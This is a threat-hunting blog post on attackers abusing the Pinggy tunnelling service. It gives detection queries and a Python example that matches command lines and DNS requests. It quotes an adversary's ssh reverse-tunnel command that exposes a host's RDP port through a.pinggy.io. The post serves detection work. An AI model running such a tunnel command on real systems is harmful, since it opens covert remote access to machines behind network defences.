186. Pinggy: Another Tunneling Solution Abused by Adversaries
Hello everyone!
Have you read CrowdStrike's recent report on SCATTERED SPIDER activity? If not, make sure you do! It contains lots of valuable information on the adversary's tactics, techniques and procedures.
One of them is abusing Pinggy, another privacy-focused tunneling solution. Interestingly, threat actors don't even have to drop its binary on the compromised system; they can just use ssh, for example:
ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no -o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io
So, the first thing to hunt for is "pinggy" in the command line:
event_type: "processcreatewin"
AND
cmdline: "pinggy"
Another opportunity is hunting for Pinggy-related domains:
event_type: "dnsreq"
AND
dns_rname: ("pinggy.io" OR "pinggy.link")
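To show the two hunting queries above as running detection logic, here is an added example (not from the original post or from CrowdStrike) that applies both rules to a handful of constructed telemetry events shaped like the fields in the queries (event_type, cmdline, dns_rname). It also pulls the local target out of the ssh -R spec so the analyst sees which service the tunnel exposed (3389, i.e. RDP, in the command from the post). The sample events, the SERVICE_BY_PORT labels and the suffix-based domain check are assumptions of this example, not something the post specifies.

```python
"""Hunt for Pinggy tunnelling over ssh in process-creation and DNS telemetry."""
from typing import Optional

# Domains from the post's second query; matched as exact name or any subdomain.
PINGGY_DOMAINS = ("pinggy.io", "pinggy.link")

# Well-known services a reverse forward commonly exposes; used only for labelling
# the hit (assumed mapping for this example).
SERVICE_BY_PORT = {22: "SSH", 445: "SMB", 3389: "RDP", 5985: "WinRM"}

# Constructed sample telemetry (not real logs). The first cmdline is the ssh
# command quoted in the post; everything else is made up for the example.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin",
     "cmdline": "ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no "
                "-o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io"},
    {"event_type": "processcreatewin",
     "cmdline": "ssh -p 22 admin@jumphost.corp.example"},
    {"event_type": "dnsreq", "dns_rname": "a.pinggy.io"},
    {"event_type": "dnsreq", "dns_rname": "xyz.a.pinggy.link"},
    {"event_type": "dnsreq", "dns_rname": "notpinggy.io.example.com"},
    {"event_type": "dnsreq", "dns_rname": "www.example.com"},
]


def is_pinggy_cmdline(event: dict) -> bool:
    """Rule 1: process creation whose command line mentions pinggy (case-insensitive)."""
    return (event.get("event_type") == "processcreatewin"
            and "pinggy" in event.get("cmdline", "").lower())


def is_pinggy_dns(event: dict) -> bool:
    """Rule 2: DNS request for pinggy.io / pinggy.link or any subdomain of them.

    A suffix check (rather than a bare substring) keeps look-alikes such as
    notpinggy.io.example.com out of the results.
    """
    if event.get("event_type") != "dnsreq":
        return False
    name = event.get("dns_rname", "").lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in PINGGY_DOMAINS)


def parse_reverse_forward(cmdline: str) -> Optional[tuple]:
    """Extract (host, port, service) from an ssh -R spec so the analyst sees
    which local service was exposed. Handles the common 'port:host:hostport'
    form, with the spec either glued to -R or given as the next argument."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if not tok.startswith("-R"):
            continue
        if len(tok) > 2:
            spec = tok[2:]
        else:
            spec = tokens[i + 1] if i + 1 < len(tokens) else ""
        parts = spec.split(":")
        if len(parts) < 3 or not parts[-1].isdigit():
            return None
        port = int(parts[-1])
        return (parts[-2], port, SERVICE_BY_PORT.get(port, "unknown"))
    return None


def hunt(events) -> list:
    """Apply both rules and return one hit record per matching event."""
    hits = []
    for ev in events:
        if is_pinggy_cmdline(ev):
            hits.append({"rule": "pinggy_cmdline", "event": ev,
                         "exposed": parse_reverse_forward(ev["cmdline"])})
        elif is_pinggy_dns(ev):
            hits.append({"rule": "pinggy_dns", "event": ev, "exposed": None})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["rule"], hit["exposed"], hit["event"])
```

Running the block prints one command-line hit (with the exposed target resolved to 127.0.0.1:3389, RDP) and two DNS hits; the look-alike domain and the ordinary jump-host ssh session are left alone.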
See you tomorrow!